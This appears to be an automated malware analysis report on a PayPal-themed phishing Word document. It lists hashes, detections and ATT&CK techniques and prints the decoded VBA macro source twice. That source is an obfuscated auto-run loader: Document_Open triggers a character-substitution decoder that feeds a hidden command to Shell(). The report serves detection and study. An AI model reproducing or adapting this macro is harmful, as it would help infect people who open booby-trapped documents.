Office (OLE) malware analysis — malicious · 7ecabf9d36b0cbe8

MALICIOUS

Office (OLE)

44.5 KB Created: 2018-10-16 04:02:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: fd815f0c13ba8bab76f2f87d45341b4b SHA-1: 93f028f34d84dfb96e85c92ff5d5e211570e943e SHA-256: 7ecabf9d36b0cbe8d52b52b6afde1b262c5a7ac09cac40e3fbec20f8b39c554b

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function, indicating it's designed to execute arbitrary commands. The document body impersonates PayPal, requesting sensitive personal information under the guise of account verification. The presence of the Shell() call suggests the macro likely downloads and executes a second-stage payload.

Heuristics 6

ClamAV: Doc.Malware.Generic-6722903-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6722903-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
mult = "68"
Shell multi, 0
multi = "84"
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Attribute VB_Customizable = True
Sub Document_Open()
w = "1"
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2811 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2811 bytes
SHA-256: `fc98d88183cf4474c8c723e0906b2f0691a95cca8018b5ed36b7ab7ec0ec8824`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() w = "1" w = "2" WARRANTY w w = "" End Sub Attribute VB_Name = "fpSymGetLineFromAddr64" Attribute VB_Base = "0{2125977A-D8F2-4365-898A-3314FD5D5B8A}{FAA21ECD-6EFB-429B-9762-E4970B73D3B1}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub FILE_Change() multi = "90" multi = "57" multi = "61" multi = "11" multi = "52" multi = "18" multi = "81" multi = "18" multi = "76" multi = fpSymGetLineFromAddr64.FILE mult = "8" mult = "91" mult = "65" mult = "25" mult = "65" mult = "9" mult = "15" mult = "57" mult = "42" mult = "24" mult = "32" mult = "36" mult = "95" mult = "5" mult = "10" mult = "16" mult = "89" mult = "90" mult = "68" Shell multi, 0 multi = "84" multi = "32" multi = "19" multi = "43" multi = "60" multi = "76" multi = "70" multi = "70" End Sub Private Sub was_Change() internal End Sub Attribute VB_Name = "two" Sub things(pSymGetLineFromAddr64, WINAPI, ByRef cstring) cstring = Right(Left(pSymGetLineFromAddr64, WINAPI), 1) End Sub Sub fd(And0, ByRef PDWORD64) PDWORD64 = "" FOR0 = 1 Try0 FOR0, PDWORD64, And0 End Sub Sub internal() fh = "" fd fpSymGetLineFromAddr64.wryh, fh fpSymGetLineFromAddr64.sometimes = fh fpSymGetLineFromAddr64.FILE = fpSymGetLineFromAddr64.sometimes End Sub Sub Try0(ByRef parse, ByRef siginfo_t, pSymInitialize) destination = Len(pSymInitialize) If parse <= destination Then th = "" things pSymInitialize, parse, th dh = 1 demangling th, dh sh = "" mytstack dh - 5, sh siginfo_t = siginfo_t + sh parse = parse + 1 Try0 parse, siginfo_t, pSymInitialize End If End Sub Sub WARRANTY(addressLen) fpSymGetLineFromAddr64.was = addressLen End Sub Sub mytstack(named, ByRef regression) regression = "" If named < 1 Then things fpSymGetLineFromAddr64.files, Len(fpSymGetLineFromAddr64.files) + named, regression Else things fpSymGetLineFromAddr64.files, named, regression End If End Sub Sub demangling(See, ByRef OS2__) type0 = 1 OS2__ = 1 result type0, OS2__, See End Sub Sub result(ByRef type0, ByRef OS2__, See) lh = 1 lh = Len(fpSymGetLineFromAddr64.files) If type0 < lh Then th = "" things fpSymGetLineFromAddr64.files, type0, th If See <> th Then type0 = type0 + 1 result type0, OS2__, See Else OS2__ = type0 End If End If End Sub

SHA-256: fc98d88183cf4474c8c723e0906b2f0691a95cca8018b5ed36b7ab7ec0ec8824

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
w = "1"
w = "2"

WARRANTY w
w = ""
End Sub

Attribute VB_Name = "fpSymGetLineFromAddr64"
Attribute VB_Base = "0{2125977A-D8F2-4365-898A-3314FD5D5B8A}{FAA21ECD-6EFB-429B-9762-E4970B73D3B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub FILE_Change()
multi = "90"
multi = "57"
multi = "61"
multi = "11"
multi = "52"
multi = "18"
multi = "81"
multi = "18"
multi = "76"
multi = fpSymGetLineFromAddr64.FILE
mult = "8"
mult = "91"
mult = "65"
mult = "25"
mult = "65"
mult = "9"
mult = "15"
mult = "57"
mult = "42"
mult = "24"
mult = "32"
mult = "36"
mult = "95"
mult = "5"
mult = "10"
mult = "16"
mult = "89"
mult = "90"
mult = "68"
Shell multi, 0
multi = "84"
multi = "32"
multi = "19"
multi = "43"
multi = "60"
multi = "76"
multi = "70"
multi = "70"
End Sub

Private Sub was_Change()
internal
End Sub

Attribute VB_Name = "two"
Sub things(pSymGetLineFromAddr64, WINAPI, ByRef cstring)
cstring = Right(Left(pSymGetLineFromAddr64, WINAPI), 1)
End Sub

Sub fd(And0, ByRef PDWORD64)
PDWORD64 = ""
FOR0 = 1
Try0 FOR0, PDWORD64, And0
End Sub

Sub internal()
fh = ""
fd fpSymGetLineFromAddr64.wryh, fh
fpSymGetLineFromAddr64.sometimes = fh
fpSymGetLineFromAddr64.FILE = fpSymGetLineFromAddr64.sometimes
End Sub

Sub Try0(ByRef parse, ByRef siginfo_t, pSymInitialize)
destination = Len(pSymInitialize)
If parse <= destination Then
th = ""
things pSymInitialize, parse, th
dh = 1
demangling th, dh
sh = ""
mytstack dh - 5, sh
siginfo_t = siginfo_t + sh
parse = parse + 1
Try0 parse, siginfo_t, pSymInitialize
End If
End Sub

Sub WARRANTY(addressLen)
fpSymGetLineFromAddr64.was = addressLen
End Sub

Sub mytstack(named, ByRef regression)
regression = ""
If named < 1 Then
things fpSymGetLineFromAddr64.files, Len(fpSymGetLineFromAddr64.files) + named, regression
Else
things fpSymGetLineFromAddr64.files, named, regression
End If
End Sub

Sub demangling(See, ByRef OS2__)
type0 = 1
OS2__ = 1
result type0, OS2__, See
End Sub
  
Sub result(ByRef type0, ByRef OS2__, See)
lh = 1
lh = Len(fpSymGetLineFromAddr64.files)
If type0 < lh Then
    th = ""
    things fpSymGetLineFromAddr64.files, type0, th
    If See <> th Then
    type0 = type0 + 1
    result type0, OS2__, See
    Else
    OS2__ = type0
    End If
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.